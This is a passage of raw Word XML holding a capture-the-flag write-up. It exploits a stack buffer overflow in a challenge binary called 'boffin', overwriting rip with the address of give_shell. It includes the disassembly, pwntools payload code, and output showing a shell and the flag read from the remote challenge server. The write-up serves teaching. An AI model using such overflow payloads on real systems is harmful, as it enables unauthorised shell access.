        <w:t xml:space="preserve"> register. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00555F5B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> register is completely overwritten at </w:t>
      </w:r>
      <w:r w:rsidRPr="00555F5B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>n=14</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> when there are </w:t>
      </w:r>
      <w:r w:rsidRPr="00555F5B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>45</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> total characters of input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B58E5C" w14:textId="450090FC" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
      <w:r>
        <w:t xml:space="preserve">Overwriting </w:t>
      </w:r>
      <w:r w:rsidRPr="00555F5B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with the address of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00555F5B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="00581DBE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>ive</w:t>
      </w:r>
      <w:r w:rsidRPr="00555F5B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>_shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>will force the program to call it when it moves to the next instru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F5B" w14:paraId="4951E49B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7866B4A1" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Dump of assembler code for function </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>give_shell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="172C89DD" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="00581DBE">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t xml:space="preserve"> 0x000000000040069d</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> &lt;+0&gt;:     push   %</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rbp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="22B1A30D" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x000000000040069e &lt;+1&gt;:     mov    %</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>rsp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>,%</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>rbp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="13C8F34E" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x00000000004006a1 &lt;+4&gt;:     mov    $0x4007a</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>4,%</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>edi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F2AB90D" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x00000000004006a6 &lt;+9&gt;:     mov    $0x</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>0,%</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>eax</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4509E6AA" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x00000000004006ab &lt;+14&gt;:    call   0x400550 &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>system@plt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27E2D16A" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x00000000004006b0 &lt;+19&gt;:    pop    %</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rbp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="3BDDDC1C" w14:textId="43889830" w:rsidR="00555F5B" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   0x00000000004006b1 &lt;+20&gt;:    ret</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3AB356C0" w14:textId="41C6E286" w:rsidR="00555F5B" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Give Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E420C75" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="31744ABC" w14:textId="1CB4FBC6" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The address is </w:t>
      </w:r>
      <w:r w:rsidR="00581DBE" w:rsidRPr="00581DBE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00581DBE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> bytes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> long; the payload will need </w:t>
      </w:r>
      <w:r w:rsidRPr="00581DBE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>40 bytes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of padding before the add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DBE" w14:paraId="059CA30C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47939888" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE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buildPayload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044F7C2A" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">base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41) for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> in range(0,40)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A06D92C" w14:textId="77777777" w:rsidR="007431EA" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">data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9d), </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>struct.pack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>("B", 0x06),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="785B1A2A" w14:textId="43C61A8A" w:rsidR="00581DBE" w:rsidRDefault="007431EA" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00581DBE">
              <w:t>struct.pack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00581DBE">
              <w:t xml:space="preserve">("B", 0x40), </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00581DBE">
              <w:t>struct.pack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00581DBE">
              <w:t xml:space="preserve">("B", 0x00), </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00581DBE">
              <w:t>struct.pack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00581DBE">
              <w:t>("B", 0x00)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13E2F9FA" w14:textId="5A07C554" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>return base + data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6527B1D0" w14:textId="68D79839" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Payload Generation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73438A1A" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
      <w:r>
        <w:t>The address is stored in the payload in reverse order because the program uses little-endian enco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DBE" w14:paraId="567524D3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17E479AE" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">def </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>getShell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(p):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="331CC940" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">payload = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>buildPayloa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2616933" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pP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"Hey! What's your name?")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E0DB846" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE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payload)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F631AE4" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>p.interactive</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32968DD0" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="680B5EEA" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE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pwnGDB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174518CB" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t># Start gdb session</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50D4D8CB" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">p </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>=  process</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>('/bin/bash')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="108DD4AB" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE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gdb ./</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>boffin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -q')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C244D55" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE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r")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1514B51F" w14:textId="07B78BFA" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>getShell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(p)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6AFAAB31" w14:textId="437BAC5E" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Attack Local Instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0115FC56" w14:textId="77777777" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
      <w:r>
        <w:t xml:space="preserve">Unfortunately, testing this payload against a local instance of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00581DBE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>boffin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> resulted in a new segmentation fa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DBE" w14:paraId="4F4C76B7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3691E47" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE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02BB6F53" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>└─$ python3 Boffin_Pwn.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BAA7B59" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[*] Switching to interactive </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>mode</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="064AE805" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>Hi, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x9d\x06@</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02B3B467" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>Program received signal SIGSEGV, Segmentation fault.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="431C89D1" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0x00007ffff7e17603 in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>do_system</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> (line=0x4007a4 "/bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17A92711" w14:textId="38DFEBD3" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    at</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t xml:space="preserve"> ..</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sysdeps</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>posix</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/system.c:148</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="43732585" w14:textId="752FE3F3" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Crash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3563CEB1" w14:textId="3527558A" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
      <w:r>
        <w:t xml:space="preserve">However, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> segmentation error occurs at a line in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00581DBE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>do_system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> that attempts to open a shell. This means that the payload successfully overwrote </w:t>
      </w:r>
      <w:r w:rsidRPr="00581DBE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> so that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00581DBE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>boffin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00581DBE">
        <w:t>ran</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00581DBE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>give_shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0B7E01" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
      <w:r>
        <w:t xml:space="preserve">Although the payload did not work on a local instance of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00581DBE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>boffin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, sending it to the remote challenge resulted in a sh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DBE" w14:paraId="5911BF45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7DD1387D" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE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shellRemote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5E7107D9" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t># Start remote session</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3146F42A" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">p = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>remote(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>HOST, PORT)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DD39542" w14:textId="0A11AB0E" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>getShell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(p)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="18E3A00C" w14:textId="1FE2B45E" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attack </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Remote </w:t>
      </w:r>
      <w:r>
        <w:t>Instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76256587" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00555F5B"/>
    <w:p w14:paraId="299E0859" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FD1AB7" w14:textId="62DBE99D" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">An attacker can use the resulting shell to access the contents of </w:t>
      </w:r>
      <w:r w:rsidRPr="00581DBE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>flag.tx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DBE" w14:paraId="0E5401EC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7064E669" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE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69E836F0" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>└─$ python3 Boffin_Pwn.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C908B81" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>[+] Opening connection to offsec-chalbroker.osiris.cyber.nyu.edu on port 1337: Done</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20448013" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[*] Switching to interactive </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>mode</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="7EF212D2" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>Hi, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x9d\x06@</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27C8EBCA" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>$ ls</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="620A74A1" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>boffin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="462932EF" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>flag.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3593CAA0" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>whoami</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="01D120C3" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pwn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="4EE29B00" w14:textId="77777777" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>$ cat flag.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BB30859" w14:textId="666137C0" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>flag{</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>access_granted_thats_real_cool</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="47DA6811" w14:textId="61ADB816" w:rsidR="00581DBE" w:rsidRDefault="00581DBE" w:rsidP="00581DBE">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Successful Exploitation</w:t>
      </w:r>
    </w:p>
